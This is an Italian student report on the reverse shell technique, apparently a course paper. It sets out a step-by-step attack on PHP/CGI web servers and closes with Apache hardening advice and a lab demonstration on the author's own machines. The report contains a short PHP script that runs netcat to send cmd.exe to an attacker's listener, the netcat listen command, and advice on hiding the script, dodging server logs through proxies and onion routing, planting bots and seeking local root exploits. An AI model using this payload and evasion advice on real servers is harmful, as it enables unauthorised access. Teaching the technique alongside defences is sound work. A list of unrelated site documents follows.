Tecnica della Reverse Shell Riccardo V. Vincelli

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "Tecnica della Reverse Shell Riccardo V. Vincelli 709588 r.vincelli@campus.unimib.it"

Transcript

1 Tecnica della Reverse Shell Riccardo V. Vincelli L' obiettivo della relazione e' illustrare come sia possibile, a patto di alcune assunzioni in termini di sicurezza non troppo restrittive, avere possibilita' d' esecuzione su un webserver tramite la tecnica della shell inversa. La trattazione vuole essere anche abbastanza pratica e rispecchia perlopiu' fedelmente esperienze avute dall' autore. 1. Terminologia Con il termine shell intendiamo principalmente la seguente cosa: la possibilita' di potere utilizzare un interprete dei comandi testuale del sistema attaccato (il programma comunemente detto shell appunto), e quindi essere in grado di eseguire comandi sulla stessa macchina

2 compromessa. L' effettivo file eseguibile che l' attaccante sceglie di utilizzare, dovrebbe essere uno sul quale egli ha dimestichezza: mentre questo discorso non ha troppo senso ad esempio sui sistemi Windows, dove l' interprete dei comandi e' fondamentalmente uno, il file cmd.exe o command.com su sistemi datati, sui sistemi Unix si hanno in genere vari interpreti a disposizione e quindi la scelta non e' indifferente, anche rispetto alle tracce che l' attaccante stesso lascia: ad esempio la bash (Bourne-Again SHell, evoluzione della Bourne SHell) offre di default una funzionalita' di cronologia dei comandi digitati (salvati nel file.bash_history, visualizzabili tramite il comando history e richiamabili tramite!n, dove n e' il numero del comando cosi' come appare nell' output di history) e quindi, una volta disconnessi, un amministratore di sistema puo' andare a vedere, in teoria, scoperta la compromissione, i comandi digitati che, potenzialmente, possono anche tradire l' attaccante; riprenderemo questo discorso

3 piu' avanti. Una shell si puo' ottenere in molti modi, la tecnica in esame non e' certamente la prima ad essere stata pensata ne' sicuramente la migliore. La shell piu' ambita e', ovviamente, quella di root/administrator, identificabile nella stragrande maggioranza dei sistemi *nix dal simbolo '#', ma non e' il nostro caso, almeno nella tecnica della reverse shell cosi' com'e': sarebbe potenzialmente possibile se, per assurdo, il webserver fosse eseguito da root. Con il verbo bucare intendiamo l' avere accesso esecutivo effettivo ad un sistema,ad esempio proprio avendo la possibilita' di una shell. Il termine puo' assumere significati affini, ma raggiungere il "buco" puo' anche non significare un qualcosa di troppo straordinario: se infatti si riesce ad avere possibilita' di esecuzione su una macchina non troppo performante, ad esempio, una

4 che risulta essere spesso irraggiungibile/sconnessa o con impedimenti formali elevati, per esempio si hanno i privilegi di un utente di comodo che non puo' molto (vedi sotto), l' avere bucato un sistema non e' cosa troppo gratificante per un attaccante. La parola bot (diminutivo di robot) intende un programma automatico che, una volta eseguito, non necessita stretta supervisione, cioe' non necessita' di input utente, e fa un qualcosa che l' attaccante reputa utile. Possiamo avere molti tipi di bot: per esempio, nel mondo di IRC (Internet Relay Chat), in alcune situazioni dei programmi bot sono utilizzati per mantenere il possesso di una stanza di discussione, o ancora nei giochi online modello client-server i bot fungono da giocatori automatici o supervisori della regolarita' del gioco stesso per evitare che gli utenti usino trucchi e similia. Un uso comune che si fa di una shell e' proprio quello di installare, ed eseguire,

5 programmi del tipo. Cio' si lega principalmente a due aspetti: -il bot ha necessita' di essere sempre connesso -esistono provider che offrono possibilita' di avere processi sempre in esecuzione e sempre connessi, ma al giorno d' oggi quasi nessuno di questi offre tale servizio gratuitamente. Quindi se il buco da' esito che si rivela positivo, cioe' se l' attaccante si accorge di avere in controllo una macchina soddisfacente, una possibilita' e' certo quella, se ne ha necessita', di installare suddetti bot. Vantaggi in questo senso possono essere: -l' amministratore non si accorge della compromissione se non andando a dare un occhiata ai processi in esecuzione (in *nix, comando ps), o alle connessioni attive (comandi netstat oppure sockstat) poiche' il programma determina utilizzo di risorse limitato ed e' silenzioso. -l' attaccante risparmia qualche soldo poiche' ottiene quello che dovrebbe pagare (anche se non troppo, la media e' quella di 2.5$ a

6 processo in background e connesso, per la durata di un mese) rivolgendosi a provider in modo legale. Le possibilita' di scenari bot-related sono molte, e possono spingersi anche ad ipotesi piu' marcatamente illegali anche se (forse?) piu' rare (drone-botnet, sniffing ecc...) 2. Assunzioni/prerequisiti Quello che dobbiamo avere e' possibilita' di scrittura su una macchina che permetta di eseguire da remoto degli script di un linguaggio interpretato: nella pratica mi rifaccio all' avere un account ftp su un webserver che monti perl o php nel contesto piu' ampio dello standard CGI (Common Gateway Interface, un modo W3C-compliant di gestire contenuti dinamici per siti web); il sistema operativo dev' essere Windows o Linux/*BSD (con buona approssimazione anche altri sistemi unix non troppo desueti possono andare).

7 Inutile dire che la possibilita' di scrittura puo' essere legittima (nostro caso) o illegittima, requisito minimo e' solo mettere gli script in un luogo dove possano essere raggiunti ed eseguiti dal webserver o meglio dall' interprete (ad esempio mod_perl per il server Apache). Questo scenario, a pensarci bene, non e' nulla di raro: provider come Aruba forniscono per pochi euro un servizio di questo tipo su base annuale ed al giorno d' oggi la stragrande maggioranza dei siti internet di privati e piccole-medie imprese sono operati in questo od altri molto affini modi (non sto citando nessuna fonte ma e' un fatto abbastanza immediato a chi abbia un minimo di dimestichezza nel campo). Un altro prerequisito, banale, e' quello di avere un web browser funzionante: per fortuna per quel che ci interessa, non ci serve altro che digitare un url ed attenderne l' esecuzione (tanto per intenderci, anche un browser come Lynx va piu' che bene, ma assumiamo InternetExplorer).

8 Altri strumenti che ci servono sono un netcat ed uno script per eseguire la shell remotamente, ed un programma per ricevere, localmente, la shell inviata da remoto (a tal proposito utilizzo ancora netcat). Lo script scritto da me e' molto semplice, e netcat e' un' utility free. 3. L' attacco Lo schema dell' attacco e' abbastanza semplice, ma potente: 1. Modificare lo script: la coppia indirizzo:porta cui mandarla. Attenzione se decidiamo di mandarla ad un indirizzo riconducibile a noi! (es. il pc di casa, molto riconducibile a noi direi) 2.Caricarlo (una cartella dove siamo sicuri sia raggiungibile e' quella dove si trova anche l' index o simili corrente) 3.Caricare netcat nello stesso luogo (netcat

9 remoto) 4.Mettere in ascolto il netcat locale sulla coppia indirizzo:porta scritti nello script 5. Eseguire lo script tramite url Attenzione se decidiamo di mandare la richiesta da un indirizzo riconducibile a noi! (es. non utilizzando proxy; ricordiamo poi che browser come IE lasciano una caterva di informazioni aggiuntive!) 6. Connettersi a dove abbiamo mandato la shell. Le istruzioni le ho riscritte in inglese nello script stesso. 4. Esame dei passi 4.1. Script Lo script fornito e' stato scritto pensando di attaccare un server Windows, dove la particolare scomodita' e' la presenza di un interprete di default non avanzato che non permette d' essere usato interattivamente da remoto: questo ci costringe ad appoggiarci a netcat anche per il lato server.

10 Ho conosciuto questa tecnica circa quattro anni fa, presi dal sito degli script sia in perl sia in php che fanno la stessa cosa ma in modo piu' avanzato ed anche sicuramente piu' fine: in particolare non ci si appoggia a netcat per l' interattivita' ma all' opzione -i delle shell redirigendo gli standard input, output ed error su una socket tcp. Ai tempi, per avere un' idea statistica di massima, 4 su 5 server risultavano proni. Riprovando oggi, la situazione e' inversa, infatti l' idea di hardening rispetto alla sicurezza degli script web e' cosa comune. Codice: <?php //Synopsis: //Spawn a reverse shell through netcat in a suitable cgi php context // //Usage: //-download NetCat for your platform (the attacking one): // --if you're on linux/unix you probably already have it installed // --a win version is at

11 //-on the attacking host (your box or one you control, whose ip is say ) // put netcat in listening mode on a free port: nc -l -p // On Windows I noticed that binding to a particular address is not working // properly, so the command I suggest is always fine. //-upload the script: // --you must upload it in a directory url-reachable (ie from a browser) // --it's necessary it supports script execution too (ie cgi-bin) //-upload netcat //-execute the script (ie //-on the console you issued the listening command, // you should receive the desired shell. // //This script is lame and is intended for spawning against a win box. //If you want finer examples ncindependent for the server side and //unix-targeting check out //

12 //Bugs: //The "manual" is way longer than the code itself // //Author: //RVV - $shell = 'nc.exe -v -n e cmd.exe'; exec($shell);?> Vedi "Esempio" per una dimostrazione dell' attacco Caricamento L' assunzione piu' comoda e' avere un account ftp o similia per uppare lo script in una directory raggiungibile dal webserver; ovviamente in generale e' quest' ultimo punto che ci interessa, non tanto come ci arriviamo (ftp o altro). Lo script e' un file php, testo quindi, e va inviato in modalita' ascii pertanto. Non e' generalmente necessario modificarne i permessi, ma e' auspicabile modificarne il nome in qualcosa che, se proprio non

13 inganni, quando lo legga, l' amministratore, almeno non gli sia lampante quando ci mette sopra gli occhi. Torneremo sotto sui "tempi di sopravvivenza" stimati di questo tipo di attacco Netcat Netcat (nc) e' un' utility unix portata anche a Windows soprannominata "coltellino svizzero di Internet", ed a buon diritto: puo' essere utilizzato in modo arbitrario come peer di una connessione tcp o udp, permettendo cose come modello client/server, trasferimento di dati, client raw e molte altre. Nel nostro caso ci limitiamo al comando per metterlo in ascolto: nc -l -p PORTA dove PORTA dev' essere ovviamente quella messa nello script. In un sistema Windows la porta in uso non dev' essere bloccata da firewall, in unix oltre a questo dobbiamo utilizzare, se non root (e veramente non ha senso che si sia loggati root in una situazione del genere, e piu' in generale ora non ha piu' senso essere loggati come root, esistendo utility come

14 sudo) una porta piu' alta di Esecuzione L' esecuzione si riduce al digitare l' opportuno url nel nostro browser di fiducia. Come gia' notato quest' azione, assieme all' utilizzo della shell ma anche maggiormente rispetto questa, e' una con la quale riveliamo un sacco di informazioni al webserver; non volendo entrare nel merito di browser particolari come detto sopra, la quantita' di informazioni rilasciata puo' essere valutata ad esempio all' indirizzo ; ricordando che tutti i webserver hanno una minima logging capability abilitata di default, e' un punto su cui proprio non possiamo transigere. Come noto, e' possibile utilizzare un proxy per "nascondere" l' indirizzo del browser, ma questa via non e' dopotutto il massimo perche': -non tutti i tipi di proxy sono anonimi (nel senso che inoltrano si' la connessione da parte nostra, ma comunicano la nostra identita' al webserver o mantengono log dei

15 client che servono) -di default, la funzionalita' di proxy dei browser permette di utilizzarne uno solo alla volta -i proxy sono difficili da trovare: quelli che veramente si rivelano funzionanti sono solitamente pochi ed in posti esotici (e con funzionanti intendiamo anche stabili, cioe' presenti in rete almeno per 24 ore senza troppa discontinuita'), nonche' subissati di richieste (specie se appaiono in cima a varie liste pubbliche come ); molti non sono altro che computer (spesso pc domestici) compromessi e suoi quali e' installata dal trojan/bot di turno una funzionalita' proxy, o tali in virtu' di misconfigurazioni/difetti di software applicativo (o una combinazione dei fattori: noto e' il binomio Sobig worm- Wingate v5) Un' alternativa sono fornitori di proxy/socks a pagamento (ma non ha troppo senso!). Un passo successivo in termini di ricerca d' anonimato puo' essere l' onion routing ( ). Ovviamente modi piu' sofisticati, avendo a

16 disposizione macchine esterne cui non siamo riconducibili (e che reputiamo sufficientemente insicure o "distratte" in termini di logging), sono sempre possibili: una molto in voga qualche anno fa (o meglio piu' di qualche anno fa) e' l' utilizzo di un datapipe, ossia di un piccolo programmino, in c o in perl solitamente, da eseguire sulla macchina intermediaria con principalmente tre argomenti: una porta locale su cui ascoltare in tcp, una porta ed host remoto cui mandare i dati ricevuti (una versione anche interattiva si puo' trovare a ippa_v2.txt ) Connettiamoci! Il passo finale non e' altro che connetterci dove abbiamo mandato la shell; se e' una prova o se ci fidiamo ci connetteremo a noi stessi. Pur essendo possibile riutilizzare netcat, e' molto piu' comodo il noto telnet: telnet e' un protocollo con i quali molti smanettoni hanno sicuramente confidenza, se non altro per azioni lamer ma sicuramente didattiche come provare a mandarci una mail

17 anonima o connettercisi ad IRC. 5. Concretizzazione dell' attacco Una volta dentro, dobbiamo decidere che fare; in qualsiasi caso, ci deve guidare il buonsenso. Anzitutto, avremo poteri limitati: la shell avra' i privilegi dell' utente che ha eseguito il demone http: in unix e' solitamente un utente di comodo (httpd, www, nobody ecc...), in Windows ci possiamo aspettare un utente non di default ma sicuramente non di livello amministrativo. Ricordiamo che oltre all' utilizzo di utenti di comodo, altre configurazioni di sicurezza adatte anche ad un ambiente DAC (discretionary access control) possono essere: -chrooting: un' applicazione e' "bloccata" in una sottodirectory, cioe' posta in un contesto dove ha tutti i file necessari al suo funzionamento sottoforma di hardlink ai file effettivi, e copie dei device in caso -jailing: sistema introdotto da FreeBSD che

18 prevede il partizionamento dell' os in vari sottosistemi virtuali indipendenti trasparentementemente all' utente. Notiamo che tutti queste possibilita' sono un qualcosa di nativo nei sistemi unix: per questo e per altri motivi (es. multiutenza e permessi stretti, paradigmi MAC-mandatory access control), sono da reputarsi piu' sicuri: semmai dubbi si possono avere circa la facilita' nel configurare l' ambiente adatto, e per sanare questo punto ci si puo' ad esempio aiutare con wizard grafici e con un approccio meno hardcore unix all' utilizzo dei file di configurazione (la strada presa da Mac OSX). Buonsenso e' anche rendersi conto che, comunque sia, danneggiare il sistema cancellando file su cui si hanno permessi e' deleterio: in prima battuta per una questione morale (stiamo buttando via lavoro altrui) in seconda per una pratica; un admin che si accorge di essere stato "battuto" ma non rileva danni, puo' pigramente prendere nota dell' accaduto e dimenticarsene (ecco magari non troppo pigramente, dovrebbe cercare di

19 capire come l' attaccante e' entrato!). Ma nel caso in cui abbia problemi di sorta, ad esempio un cliente del provider che possiede il webserver si ritrova lo spazio web interamente cancellato, inattivo per del tempo, e la colpa finisce sull' admin, puo' magari mettersi a spulciare, termine non correttissimo visto che esiste software che agevola il processo, i log di sistema e provare a non farla passare liscia all' attaccante. Posto che non facciamo nessuna azione che ci renda visibili (cancellazioni gratuite o anche defacciamenti dei siti), ci chiediamo ora come fare per rimanere piu' a lungo possibile invisibili (o nascosti bene) agli occhi dell' admin. La tecnica della reverse shell dovrebbe essere un punto di partenza e non di arrivo: non abbiamo in casi normali grossi privilegi e siamo dipendenti da uno script. Settarlo nascosto e "nasconderlo" in sottocartelle puo' aiutare, tutto dipende dalla frequenza con cui il sito internet e'

20 aggiornato ma soprattutto da come: se per assurdo il webmaster o chi per esso usano solo cms (content management systems) e non danno mai un occhio alla webroot per esempio via ftp, ci sono buone possibilita' per noi in questo senso, giusto per citare uno scenario. Se la vediamo appunto come partenza, il passo successivo e' ottenere quel che vogliamo dal sistema nel miglior modo possibile; e con cio' comprendiamo un range di possibilita' vasto, su cui soffermarsi sarebbe troppo lungo: nascondiamo in /tmp (dove sicuramente abbiamo accesso in scrittura) il bot che vogliamo eseguire, o iniziamo a cercare in rete un exploit locale per ottenere la root? In questa fase generalmente non possiamo prescindere dal sistema in uso, in un livello di dettaglio anche abbastanza alto: ad esempio se siamo su una linux box a kernel x.y.z.-tu, dobbiamo cercare un qualcosa appositamente per quel kernel. E' quasi impossibile trovare exploit potenti locali che sfruttino componenti native del

21 sistema come kernel, librerie famose ecc; paga molto di piu' cercare di isolare la presenza di software applicativi particolari sul sistema, ad esempio associati a servizi, e cercare attacchi per questi. Meglio ancora se proprietari o di vendor non famosissimi: in questi casi il codice quasi sicuramente chiuso facilita un eventuale successo. Certo, se l' attaccante e' veramente di alto livello, puo' contare sugli zeroday: ma questo e' un altro discorso. 6. Cure e prevenzioni Come d' obbligo, bisogna anche mettersi nei panni dell' admin: poniamo che si accorga della compromissione del sistema, cosa dovrebbe fare? La risposta e' valida in senso generale e possiamo astrarla dall' attacco particolare della reverse shell: -cercare file e processi sospetti e cancellarli, terminarli -esaminare i log di sistema ed applicativi -isolare le componenti che potrebbero nascondere la falla

22 -documentarsi circa vulnerabilita' note su queste (CVE, BugTraq, siti vendor ecc) -confrontarsi con altri colleghi -arrivare ad una soluzione E' curioso come molte volte siano gli attaccanti stessi a tendere una mano agli amministratori di sistema suggerendo la vulnerabilita' da essi sfruttata o addirittura fornendo una patch. Per le prevenzioni invece possiamo portarci piu' nello specifico proprio rispetto alla reverse shell; queste sono solo alcune delle possibili vie Disabilitare gli interpreti in questione/rinunciare alla common gateway interface: se non c'e' modo di interpretare gli script, essi ovviamente sono innocui; e' una soluzione drastica che puo' non essere accettabile se la tecnologia cgi e' parte integrante dell' uso comune del nostro webserver. Come abbiamo spesso riflettuto in aula, una risposta del tipo e' una risposta efficace ma e' un po' un' ultima spiaggia. Un' altra soluzione molto piu' logica puo'

23 essere configurare opportunamente quel che si puo' fare e non, in termini di script! Mi rifaccio ad una situazione cgi su Apache: Apache e' infatti il webserver piu' comune e tra i piu' sicuri; analoghe prevenzioni si possono avere sull' IIS di Microsoft, che sta cercando di colmare il gap ma non puo' certo contare su una community come quella di Apache. Abbiamo: httpd.conf/.htaccess httpd.conf e' il file di configurazione principale di Apache, l' abilitazione ed il settaggio del cgi passano da qui. Possiamo permettere l' esecuzione di script cgi (in un qualsiasi linguaggio adatto) in vari modi: -direttiva ScriptAlias: le directory che la seguono sono indicate al server come le uniche che in un url possono prevedere l' interpretazione di uno script; se ad esempio ho:...

24 ScriptAlias /cgibin/... l' url non determina una richiesta a buon fine dato che la cartella non e' tra quelle indicate. -direttiva Options:... <Directory /usr/local/apache2/htdocs/somedir> Options +ExecCGI </Directory>... che pero' richiede anche di specificare le estensioni d' interesse (differentemente dal modo con ScriptAlias che intende tutti i file nelle directory specificate come potenziali script):... AddHandler cgi-script.cgi.pl... Con queste indicazioni, evitando di lasciare agli utenti cartelle abilitate agli script dove ne possano mettere di loro, si raggiunge un buon livello di sicurezza. In caso in cui si voglia portare questo cgi

25 hardening ma non si abbia accesso al httpd.conf, si possono utilizzare, nei limiti definiti nel httpd.conf stesso, i file.htaccess, che non sono altro che override di quest' ultimo cui effetto e' sulla cartella in cui si trovano e tutte le sottocartelle (ad esempio ha senso metterne uno nella webroot) Controllare i file caricati E' possibile pensare ad un processo che verifichi direttamente il contenuto dei file nell' albero directory ed agisca di conseguenza: se in una cartella mi aspetto solo immagini, elimino i file che non lo sono; se in un' altra mi aspetto solo codice html, non mi basta verificare l' estensione, ma vado alla ricerca di pattern (es. #!/usr/bin/perl) in base a cui elimino file dannosi; e' possibile anche pensare ad un report program. Un semplice script del potente ambiente shell puo' essere: #!/bin/sh while true; do for file in * do a=$(file $file)

26 b=$file": PHP script text" c=$file": perl script text executable" if test "$a" = "$b" then rm -f $file elif test "$a" = "$c" then rm -f $file fi; done done dove in pratica, per ogni file nella directory dove lo script e' eseguito, se ne verifica il tipo tramite l' utility file, e se e' di tipo php o perl, lo si elimina; lo script e' semplice anche se ha come punti delicati l' assegnamento dell' output di un comando ad una variabile (costrutto $(command)) e la concatenazione di due stringhe (variabili $b e $c); attenzione anche al quoting (utilizzando '' al posto di "" abbiamo errore perche' le variabili non sono valutate). Lo script e' da posizionare nelle directory sensibili; ovviamente si possono avere script piu' complessi ad esempio che prendono l' input delle estensioni trigger da un file e controllano una lista di directory prefissata, ecc. E' preferibile eseguirlo in background (posponendo la &) e regolarne l' esecuzione in startup (ad esempio via cron).

27 Non dimentichiamo che uno script del genere puo' essere utilizzato anche su ambiente Windows: essendo il batch scripting piu' debole, si puo' talvolta pensare all' uso di ambienti d' emulazione ad-hoc come Cygwin Rinominare i file Questo metodo e' abbastanza debole se adottato in un sistema in cui l' utente attaccante ha accesso di lettura e scrittura pieno, ma buono se percaso l' utente puo' solo fare upload senza avere la possibilita' di vedere il contenuto della cartella dove carica file; cambiando il nome dei file (es. attraverso hashing), l' attaccante non sara' piu' in grado di formulare un trigger url valido; non si applica al nostro scenario dove abbiamo assunto possibilita' ftp equivalenti. 7. Conclusioni L' attacco della shell inversa ha sicuramente una sua importanza didattica, poiche' tocchiamo vari argomenti: dall' ambiente di shell ai linguaggi di scripting.

28 In termini di efficacia effettiva non e' forse esaltante: anche quando si riesca a caricare con successo, ed a fare in modo che non venga cancellato, nei limiti del possibile, lo script, le incognite sono rappresentate dal poter eseguire l' interprete dei comandi, ed il doversi fermare, almeno in prima battuta, a privilegi bassi. Piu' in generale sfruttare l' "aiuto" degli linguaggi interpretati e' una modalita' d' attacco applicata anche sotto altri nomi, e citiamo tra gli altri: SQL injection: l' attacco consiste nel presentare in una query sql dati arbitrari opportunamente scritti. Scenario tipico e' quello di un file html contenente il form ed un file in un linguaggio interpretato (es. php) incaricato di interfacciarsi col dbms per inoltrare effettivamente l' interrogazione. In caso di controlli deboli dal lato server, sono possibili situazioni di autenticazione senza credenziali ma sullo stesso paradigma e' possibile pensare anche ad arrivare alla shell

29 se il dbms espone comandi opportuni (es. "esegui comando locale"). La reverse shell e' attacco in linea generale aperto se non ai lamer nella gerarchia degli smanettoni, almeno ai kiddie: infatti le conoscenze da avere sono veramente poche ed il ritocco del codice banale (parametri host e porta): script del tipo e' suggerito modificarli leggermente (es. cancellazione d' una parentesi) per scoraggiare proprio gli utenti infimi prima di rilasciarli in the wild, anche se solo come proof of concept, che in fin dei conti non e' altro che termine eufemismo per exploit. 8. Esempio Provo ad instaurare l' attacco da macchina Windows ad un' altra ancora Windows, premettendo che sono entrambe mie, collegate in lan in modo diretto. L' ambiente web e' rappresentato, per quel che c' interessa, dal server web Apache con

30 mod_php abilitato; in particolare per fare piu' in fretta con la configurazione, ed anche perche' e' solo un esempio, ho optato per binari preconfigurati e precompilati con IndigoAMPP della software house IndigoStar. Inutile dire che scelte del tipo sono fondamentalmente sbagliate nel caso dell' allestimento di un server vero e proprio. La documentazione ufficiale Apache poi e' esauriente circa l' installazione del webserver in ambiente Windows, anche se l' ambiente di riferimento naturale e' certamente uno di stampo unix. La webroot; evidenziati i file d' attacco nc e script:

31 In ascolto sulla macchina attaccante:

32 Esecuzione dello script:

33 La shell e' arrivata! Notiamo che l' ultimo comando e' un comando dal basso buonsenso!

34 9. Webografia/link utili

Scritto da Administrator Martedì 02 Settembre 2008 06:30 - Ultimo aggiornamento Martedì 10 Maggio 2011 17:15

Scritto da Administrator Martedì 02 Settembre 2008 06:30 - Ultimo aggiornamento Martedì 10 Maggio 2011 17:15 Entrare in un pc è una espressione un po generica...può infatti significare più cose: - Disporre di risorse, quali files o stampanti, condivise, rese fruibili liberamente o tramite password con i ripettivi

Dettagli

Tecnologie per il Web. Il web: Architettura HTTP HTTP. SSL: Secure Socket Layer

Tecnologie per il Web. Il web: Architettura HTTP HTTP. SSL: Secure Socket Layer Tecnologie per il Web Il web: architettura e tecnologie principali Una analisi delle principali tecnologie per il web Tecnologie di base http, ssl, browser, server, firewall e proxy Tecnologie lato client

Dettagli

Corso di Web programming Modulo T3 A2 - Web server

Corso di Web programming Modulo T3 A2 - Web server Corso di Web programming Modulo T3 A2 - Web server 1 Prerequisiti Pagine statiche e dinamiche Pagine HTML Server e client Cenni ai database e all SQL 2 1 Introduzione In questa Unità si illustra il concetto

Dettagli

Server web e protocollo HTTP

Server web e protocollo HTTP Server web e protocollo HTTP Dott. Emiliano Bruni (info@ebruni.it) Argomenti del corso Cenni generali sul web IIS e Apache Il server web Micsosoft Internet Information Server 5.0 Il server web Apache 2.0

Dettagli

DATABASE IN RETE E PROGRAMMAZIONE LATO SERVER

DATABASE IN RETE E PROGRAMMAZIONE LATO SERVER DATABASE IN RETE E PROGRAMMAZIONE LATO SERVER L architettura CLIENT SERVER è l architettura standard dei sistemi di rete, dove i computer detti SERVER forniscono servizi, e computer detti CLIENT, richiedono

Dettagli

Laboratorio di Progettazione Web

Laboratorio di Progettazione Web Il Server web Laboratorio di Progettazione Web AA 2009/2010 Chiara Renso ISTI- CNR - c.renso@isti.cnr.it E un programma sempre attivo che ascolta su una porta le richieste HTTP. All arrivo di una richiesta

Dettagli

Il Web Server e il protocollo HTTP

Il Web Server e il protocollo HTTP Corso PHP Parte 2 Il Web Server e il protocollo HTTP E un programma sempre attivo che ascolta su una porta le richieste HTTP. All arrivo di una richiesta la esegue e restituisce il risultato al browser,

Dettagli

MediaWiki. Giuseppe Frisoni

MediaWiki. Giuseppe Frisoni MediaWiki Giuseppe Frisoni MediaWiki: costruire insieme 1/2 L'enorme successo di Wikipedia, la nota enciclopedia online, è sotto gli occhi di tutti; cosa meno nota, invece, è la piattaforma con cui è progettata.

Dettagli

2. Strutture dei Sistemi Operativi

2. Strutture dei Sistemi Operativi 1 2. Strutture dei Sistemi Operativi Quali servizi un generico sistema operativo mette a disposizione degli utenti, e dei programmi che gli utenti vogliono eseguire? interfaccia col sistema operativo stesso

Dettagli

19. LA PROGRAMMAZIONE LATO SERVER

19. LA PROGRAMMAZIONE LATO SERVER 19. LA PROGRAMMAZIONE LATO SERVER Introduciamo uno pseudocodice lato server che chiameremo Pserv che utilizzeremo come al solito per introdurre le problematiche da affrontare, indipendentemente dagli specifici

Dettagli

MySQL Controllare gli accessi alla base di dati A cura di Silvio Bonechi per http://www.pctrio.com

MySQL Controllare gli accessi alla base di dati A cura di Silvio Bonechi per http://www.pctrio.com MySQL Controllare gli accessi alla base di dati A cura di Silvio Bonechi per http://www.pctrio.com 15.03.2006 Ver. 1.0 Scarica la versione pdf ( MBytes) Nessuno si spaventi! Non voglio fare né un manuale

Dettagli

SCP: SCHEDULER LAYER. a cura di. Alberto Boccato

SCP: SCHEDULER LAYER. a cura di. Alberto Boccato SCP: SCHEDULER LAYER a cura di Alberto Boccato PREMESSA: Negli ultimi tre anni la nostra scuola ha portato avanti un progetto al quale ho partecipato chiamato SCP (Scuola di Calcolo Parallelo). Di fatto

Dettagli

Corso di Informatica. Prerequisiti. Modulo T3 B3 Programmazione lato server. Architettura client/server Conoscenze generali sui database

Corso di Informatica. Prerequisiti. Modulo T3 B3 Programmazione lato server. Architettura client/server Conoscenze generali sui database Corso di Informatica Modulo T3 B3 Programmazione lato server 1 Prerequisiti Architettura client/server Conoscenze generali sui database 2 1 Introduzione Lo scopo di questa Unità è descrivere gli strumenti

Dettagli

Server dolphin: installazione e configurazione di un server web

Server dolphin: installazione e configurazione di un server web Università degli Studi G. D Annunzio Chieti Pescara GASL - Gruppo assistenza sistemistica laboratori Server dolphin: installazione e configurazione di un server web Seminario di Carlo Capuani Cos è un

Dettagli

Un caso concreto di risposta ad un attacco hacker

Un caso concreto di risposta ad un attacco hacker Un caso concreto di risposta ad un attacco hacker http://escher07.altervista.org Premessa Questo documento è ottenuto come generalizzazione di un caso reale. Sono stati oscurati per ovvi motivi indirizzi

Dettagli

Manuale per la configurazione di AziendaSoft in rete

Manuale per la configurazione di AziendaSoft in rete Manuale per la configurazione di AziendaSoft in rete Data del manuale: 7/5/2013 Aggiornamento del manuale: 2.0 del 10/2/2014 Immagini tratte da Windows 7 Versione di AziendaSoft 7 Sommario 1. Premessa...

Dettagli

Console di Amministrazione Centralizzata Guida Rapida

Console di Amministrazione Centralizzata Guida Rapida Console di Amministrazione Centralizzata Contenuti 1. Panoramica... 2 Licensing... 2 Panoramica... 2 2. Configurazione... 3 3. Utilizzo... 4 Gestione dei computer... 4 Visualizzazione dei computer... 4

Dettagli

Siti interattivi e dinamici. in poche pagine

Siti interattivi e dinamici. in poche pagine Siti interattivi e dinamici in poche pagine 1 Siti Web interattivi Pagine Web codificate esclusivamente per mezzo dell HTML non permettono alcun tipo di interazione con l utente, se non quella rappresentata

Dettagli

Il DBMS Oracle. Express Edition. Donatella Gubiani e Angelo Montanari

Il DBMS Oracle. Express Edition. Donatella Gubiani e Angelo Montanari Gubiani & Montanari Il DBMS Oracle 1 Il DBMS Oracle Express Edition Donatella Gubiani e Angelo Montanari Il DBMS Oracle Il DBMS Oracle Oracle 10g Express Edition Il DBMS Oracle (nelle sue versioni più

Dettagli

2009. STR S.p.A. u.s. Tutti i diritti riservati

2009. STR S.p.A. u.s. Tutti i diritti riservati 2009. STR S.p.A. u.s. Tutti i diritti riservati Sommario COME INSTALLARE STR VISION CPM... 3 Concetti base dell installazione Azienda... 4 Avvio installazione... 4 Scelta del tipo Installazione... 5 INSTALLAZIONE

Dettagli

Guida pratica all utilizzo di Zeroshell

Guida pratica all utilizzo di Zeroshell Guida pratica all utilizzo di Zeroshell Il sistema operativo multifunzionale creato da Fulvio.Ricciardi@zeroshell.net www.zeroshell.net Proteggere una piccola rete con stile ( Autore: cristiancolombini@libero.it

Dettagli

Corso di PHP. Prerequisiti. 1 - Introduzione

Corso di PHP. Prerequisiti. 1 - Introduzione Corso di PHP 1 - Introduzione 1 Prerequisiti Conoscenza HTML Principi di programmazione web Saper progettare un algoritmo Saper usare un sistema operativo Conoscere il concetto di espressione 2 1 Introduzione

Dettagli

ORIEME ITALIA SpA Viale Sarca, 45 Telefono +39 02.64.41.16.1 Orieme Italia S.p.A. I-20125 Milano Telefax +39 02.64.36.990 www.orieme.

ORIEME ITALIA SpA Viale Sarca, 45 Telefono +39 02.64.41.16.1 Orieme Italia S.p.A. I-20125 Milano Telefax +39 02.64.36.990 www.orieme. Visio Wifi Setup - Windows Rev. 1.0.0 Prerequisiti: Prima di procedere con l installazione assicurarsi di avere pieno accesso alla configurazione del router Wifi. Attenzione: non tutti i router risultano

Dettagli

GLI SCRIPT DI SHELL. Lucidi a cura di B.De Carolis. UNIX shell script UdB- Dip Informatica

GLI SCRIPT DI SHELL. Lucidi a cura di B.De Carolis. UNIX shell script UdB- Dip Informatica GLI SCRIPT DI SHELL Lucidi a cura di B.De Carolis Shell Unix - Linux comandi Interfaccia di alto livello tra utente e SO. Il processore interpreta e mette in esecuzione comandi da: 1) standard input o

Dettagli

Guida al Controllo Remoto del proprio PC con VNC e Fastweb (Versione SSL)

Guida al Controllo Remoto del proprio PC con VNC e Fastweb (Versione SSL) Guida al Controllo Remoto del proprio PC con VNC e Fastweb (Versione SSL) Ver. 1.0 rev.1.1 del 14/12/2003 By EnergyDrink emailto:energydrink@fastwebnet.it Questa che segue, e una delle possibili soluzioni

Dettagli

Introduzione ai servizi di Linux

Introduzione ai servizi di Linux Introduzione ai servizi di Linux Premessa Adios è un interessante sistema operativo Linux basato sulla distribuzione Fedora Core 6 (ex Red Hat) distribuito come Live CD (con la possibilità di essere anche

Dettagli

14 maggio 2010 Versione 1.0

14 maggio 2010 Versione 1.0 SOFTWARE PER LA GESTIONE DI UN SISTEMA PER LA RILEVAZIONE DELLA QUALITÀ PERCEPITA DAGLI UTENTI, NEI CONFRONTI DI SERVIZI RICHIESTI ALLA PUBBLICA AMMINISTRAZIONE, ATTRAVERSO L'UTILIZZO DI EMOTICON. 14 maggio

Dettagli

Il web server Apache Lezione n. 3. Introduzione

